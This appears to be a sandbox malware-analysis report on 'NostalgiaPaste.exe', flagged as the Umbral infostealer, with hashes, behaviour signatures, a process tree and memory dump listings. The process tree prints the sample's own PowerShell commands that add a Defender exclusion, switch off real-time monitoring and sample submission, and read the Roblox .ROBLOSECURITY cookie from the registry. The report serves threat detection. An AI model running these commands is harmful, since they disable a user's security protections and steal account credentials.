Overview

overview

10

Static

static

3

NostalgiaPaste.rar

windows7-x64

3

NostalgiaPaste.rar

windows10-2004-x64

7

InjectionLibrary.dll

windows7-x64

1

InjectionLibrary.dll

windows10-2004-x64

1

NostalgiaPaste.exe

windows7-x64

10

NostalgiaPaste.exe

windows10-2004-x64

10

Analysis

  • max time kernel
    149s
  • max time network
    149s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20231222-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20231222-enlocale:en-usos:windows10-2004-x64system
  • submitted
    11-01-2024 14:11

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    NostalgiaPaste.exe

  • Size

    614KB

  • MD5

    863ccaa8f5615fd603e3df9e08d433c6

  • SHA1

    58e5ac27b4c8ce04b705fbd4fc267c7c96ae8438

  • SHA256

    b502a581b8b5f291508791631fbd40853edc952572eaa214086f6a91694a284a

  • SHA512

    715dccca665ffc88da761fc2ae0a9a01a477c3546b86fc0922ca033b4826f44b42c2c718b1adec2c26e9736e3e81c144ef5f5161706daa3acbabe8b0f952a906

  • SSDEEP

    12288:3l/5a8Yv+Gk+IRvmf8lDATKwRP7NaaWSxpumTFzoLIOnrDjfBlfrkfVNaw9mmrz6:3P9rGbIRuf8lkRP7NaLGNoLbjfBl4NN7

Score
10/10
umbralspywarestealer

Malware Config

Signatures

  • Detect Umbral payload 2 IoCs
  • Umbral

    Umbral stealer is an opensource moduler stealer written in C#.

    stealerumbral
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 1 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

    spywarestealer
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Detects videocard installed 1 TTPs 1 IoCs

    Uses WMIC.exe to determine videocard installed.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 20 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\NostalgiaPaste.exe
    "C:\Users\Admin\AppData\Local\Temp\NostalgiaPaste.exe"
    1⤵
    • Checks computer location settings
    • Suspicious use of NtSetInformationThreadHideFromDebugger
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:4212
    • C:\Users\Admin\AppData\Local\Temp\nostalgia_authentication.exe
      "C:\Users\Admin\AppData\Local\Temp\nostalgia_authentication.exe"
      2⤵
      • Executes dropped EXE
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:4592
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\nostalgia_authentication.exe'
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2420
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
        3⤵
          PID:2492
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
          3⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:3060
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
          3⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:4124
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
          3⤵
          • Suspicious behavior: EnumeratesProcesses
          PID:4732
          • C:\Windows\System32\Conhost.exe
            \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            4⤵
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:2492
        • C:\Windows\System32\Wbem\wmic.exe
          "wmic" path win32_VideoController get name
          3⤵
          • Detects videocard installed
          PID:932
        • C:\Windows\System32\Wbem\wmic.exe
          "wmic.exe" csproduct get uuid
          3⤵
            PID:1700
          • C:\Windows\System32\Wbem\wmic.exe
            "wmic.exe" computersystem get totalphysicalmemory
            3⤵
            • Suspicious use of AdjustPrivilegeToken
            PID:2712
          • C:\Windows\System32\Wbem\wmic.exe
            "wmic.exe" os get Caption
            3⤵
            • Suspicious use of AdjustPrivilegeToken
            PID:2020

      Network

      MITRE ATT&CK Enterprise v15

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • memory/2420-33-0x000002DCEBFB0000-0x000002DCEBFD2000-memory.dmp

        Filesize

        136KB

        Download

      • memory/2420-39-0x00007FFF93C80000-0x00007FFF94741000-memory.dmp

        Filesize

        10.8MB

        Download

      • memory/2420-34-0x00007FFF93C80000-0x00007FFF94741000-memory.dmp

        Filesize

        10.8MB

        Download

      • memory/2420-35-0x000002DCEB7E0000-0x000002DCEB7F0000-memory.dmp

        Filesize

        64KB

        Download

      • memory/2420-36-0x000002DCEB7E0000-0x000002DCEB7F0000-memory.dmp

        Filesize

        64KB

        Download

      • memory/2492-55-0x00007FFF93C80000-0x00007FFF94741000-memory.dmp

        Filesize

        10.8MB

        Download

      • memory/2492-53-0x000001616A290000-0x000001616A2A0000-memory.dmp

        Filesize

        64KB

        Download

      • memory/2492-52-0x000001616A290000-0x000001616A2A0000-memory.dmp

        Filesize

        64KB

        Download

      • memory/2492-51-0x00007FFF93C80000-0x00007FFF94741000-memory.dmp

        Filesize

        10.8MB

        Download

      • memory/3060-104-0x00007FFF93C80000-0x00007FFF94741000-memory.dmp

        Filesize

        10.8MB

        Download

      • memory/3060-101-0x0000020D59C20000-0x0000020D59C30000-memory.dmp

        Filesize

        64KB

        Download

      • memory/3060-100-0x00007FFF93C80000-0x00007FFF94741000-memory.dmp

        Filesize

        10.8MB

        Download

      • memory/4124-61-0x00000218F2020000-0x00000218F2030000-memory.dmp

        Filesize

        64KB

        Download

      • memory/4124-62-0x00000218F2020000-0x00000218F2030000-memory.dmp

        Filesize

        64KB

        Download

      • memory/4124-60-0x00007FFF93C80000-0x00007FFF94741000-memory.dmp

        Filesize

        10.8MB

        Download

      • memory/4124-88-0x00007FFF93C80000-0x00007FFF94741000-memory.dmp

        Filesize

        10.8MB

        Download

      • memory/4212-20-0x0000000005730000-0x0000000005740000-memory.dmp

        Filesize

        64KB

        Download

      • memory/4212-4-0x0000000005EF0000-0x0000000006494000-memory.dmp

        Filesize

        5.6MB

        Download

      • memory/4212-1-0x0000000000980000-0x0000000000AD0000-memory.dmp

        Filesize

        1.3MB

        Download

      • memory/4212-0-0x00000000746A0000-0x0000000074E50000-memory.dmp

        Filesize

        7.7MB

        Download

      • memory/4212-3-0x0000000005730000-0x0000000005740000-memory.dmp

        Filesize

        64KB

        Download

      • memory/4212-2-0x0000000002F20000-0x0000000002F21000-memory.dmp

        Filesize

        4KB

        Download

      • memory/4212-59-0x00000000746A0000-0x0000000074E50000-memory.dmp

        Filesize

        7.7MB

        Download

      • memory/4212-5-0x0000000005940000-0x00000000059D2000-memory.dmp

        Filesize

        584KB

        Download

      • memory/4212-8-0x0000000007620000-0x000000000765E000-memory.dmp

        Filesize

        248KB

        Download

      • memory/4212-7-0x0000000005700000-0x000000000570A000-memory.dmp

        Filesize

        40KB

        Download

      • memory/4212-6-0x0000000005510000-0x000000000552C000-memory.dmp

        Filesize

        112KB

        Download

      • memory/4212-86-0x0000000005730000-0x0000000005740000-memory.dmp

        Filesize

        64KB

        Download

      • memory/4212-89-0x0000000005730000-0x0000000005740000-memory.dmp

        Filesize

        64KB

        Download

      • memory/4592-21-0x0000028E8C800000-0x0000028E8C840000-memory.dmp

        Filesize

        256KB

        Download

      • memory/4592-85-0x00007FFF93C80000-0x00007FFF94741000-memory.dmp

        Filesize

        10.8MB

        Download

      • memory/4592-58-0x0000028EA6EB0000-0x0000028EA6ECE000-memory.dmp

        Filesize

        120KB

        Download

      • memory/4592-22-0x00007FFF93C80000-0x00007FFF94741000-memory.dmp

        Filesize

        10.8MB

        Download

      • memory/4592-107-0x0000028EA7100000-0x0000028EA7112000-memory.dmp

        Filesize

        72KB

        Download

      • memory/4592-106-0x0000028EA6EF0000-0x0000028EA6EFA000-memory.dmp

        Filesize

        40KB

        Download

      • memory/4592-56-0x0000028EA6F30000-0x0000028EA6FA6000-memory.dmp

        Filesize

        472KB

        Download

      • memory/4592-102-0x0000028EA6DA0000-0x0000028EA6DB0000-memory.dmp

        Filesize

        64KB

        Download

      • memory/4592-57-0x0000028EA6FB0000-0x0000028EA7000000-memory.dmp

        Filesize

        320KB

        Download

      • memory/4592-23-0x0000028EA6DA0000-0x0000028EA6DB0000-memory.dmp

        Filesize

        64KB

        Download

      • memory/4592-128-0x00007FFF93C80000-0x00007FFF94741000-memory.dmp

        Filesize

        10.8MB

        Download

      • memory/4732-121-0x000002067CA80000-0x000002067CA90000-memory.dmp

        Filesize

        64KB

        Download

      • memory/4732-123-0x00007FFF93C80000-0x00007FFF94741000-memory.dmp

        Filesize

        10.8MB

        Download

      • memory/4732-120-0x00007FFF93C80000-0x00007FFF94741000-memory.dmp

        Filesize

        10.8MB

        Download